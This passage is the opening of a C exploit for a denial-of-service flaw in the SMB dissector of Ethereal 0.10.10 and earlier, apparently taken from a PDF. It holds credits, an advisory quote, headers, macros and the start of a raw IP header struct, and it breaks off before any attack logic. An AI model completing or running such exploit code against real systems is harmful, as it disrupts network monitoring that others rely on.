1 /*****************************************************************/
2 /* */
3 /* Ethereal <= 0.10.10 dissect_ipc_state() DoS */
4 /* Tested on 0.9.4 and 0.10.10 */
5 /* */
6 /* Bug found by the Ethereal BuildBot */
7 /* Code ripped from vade79 */
8 /* Exploit by Nicob <nicob@nicob.net> */
9 /* */
10 /* From the Ethereal Security Advisory #19 : */
11 /* http://www.ethereal.com/appnotes/enpa−sa−00019.html */
12 /* */
13 /* "The SMB dissector could cause a segmentation fault and throw */
14 /* assertions. Versions affected: 0.9.0 to 0.10.10" */
15 /* */
16 /*****************************************************************/
17
18 #include <stdio.h>
19 #include <stdlib.h>
20 #include <unistd.h>
21 #include <string.h>
22 #include <signal.h>
23 #include <time.h>
24 #include <sys/socket.h>
25 #include <sys/types.h>
26 #include <netinet/in.h>
27 #include <netdb.h>
28 #ifdef _USE_ARPA
29 #include <arpa/inet.h>
30 #endif
31
32 /* doesn’t seem to be standardized, so... */
33 #if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
34 #define BYTE_ORDER __BYTE_ORDER
35 #endif
36 #if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
37 #define BIG_ENDIAN __BIG_ENDIAN
38 #endif
39 #if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
40 #if BYTE_ORDER == BIG_ENDIAN
41 #define _USE_BIG_ENDIAN
42 #endif
43 #endif
44
45 /* will never need to be changed. */
46 #define SMB_PORT 138
47
48 /* avoid platform−specific header madness. */
49 /* (just plucked out of header files) */
50 struct iph{
51 #ifdef _USE_BIG_ENDIAN
52 unsigned char version:4,ihl:4;
Page 1/6
Et